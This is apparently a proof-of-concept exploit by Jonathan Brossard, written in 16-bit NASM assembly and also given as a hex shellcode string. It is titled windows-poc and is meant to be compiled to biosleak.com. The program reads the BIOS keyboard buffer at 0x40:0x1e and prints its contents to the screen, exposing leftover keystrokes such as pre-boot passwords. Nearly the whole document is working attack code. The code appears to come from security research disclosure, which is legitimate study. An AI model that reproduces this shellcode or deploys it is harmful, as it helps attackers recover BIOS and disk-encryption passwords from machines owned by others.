;------------------- [ windows-poc.asm ] -----------------------; ; ; ; Jonathan Brossard // [email protected] ; ; [email protected] ; ; ; ; 16b shellcode, BIOS Api only used : aimed at being Xplatform ; ; if run under virtual or real mode... ; ; ; ; Compiling : nasm -fbin ./windows-poc.asm -o biosleak.com ; ;---------------------------------------------------------------; ;\x30\xe4\xb0\x40\x8e\xd8\xb0\x1c\x89\xc6\x30\xed\xb1\x10\x3e\x8b ;\x04\x30\xe4\x3c\x20\x72\x04\x3c\x7e\x72\x02\xb0\x20\x83\xc6\x02 ;\x56\x51\x50\xb4\x03\x30\xff\xcd\x10\xb4\x02\xfe\xc2\xcd\x10\x58 ;\xb4\x0a\xb3\x06\xb1\x01\xcd\x10\x59\x5e\xe2\xd2\x30\xe4\xb0\x4c ;\xcd\x21 org 100h section .text _start: xor ah,ah mov al,0x40 ; 0x40:0x1e : keyboard buffer address mov ds,ax mov al, 0x1c mov si, ax xor ch,ch mov cl, 0x10 leakloop: mov ax, [ds:si] xor ah,ah cmp al, 0x20 jb keepcopying cmp al, 0x7e jb keepcopying2 keepcopying: mov al, 0x20 keepcopying2: add si, byte +0x2 ; Replace this line by add si,4 ; if you plan to use it under MS-Dos ; due to imperfect emulation of 16b ; arch under windows. push si push cx push ax mov ah, 0x03 xor bh, bh int 0x10 mov ah, 0x02 inc dl int 0x10 pop ax mov ah, 0ah mov bl, 06h mov cl, 0x01 int 0x10 pop cx pop si loop leakloop ;----- Terminate as well as we can... xor ah,ah int 0x16 int 0x19 ;EOF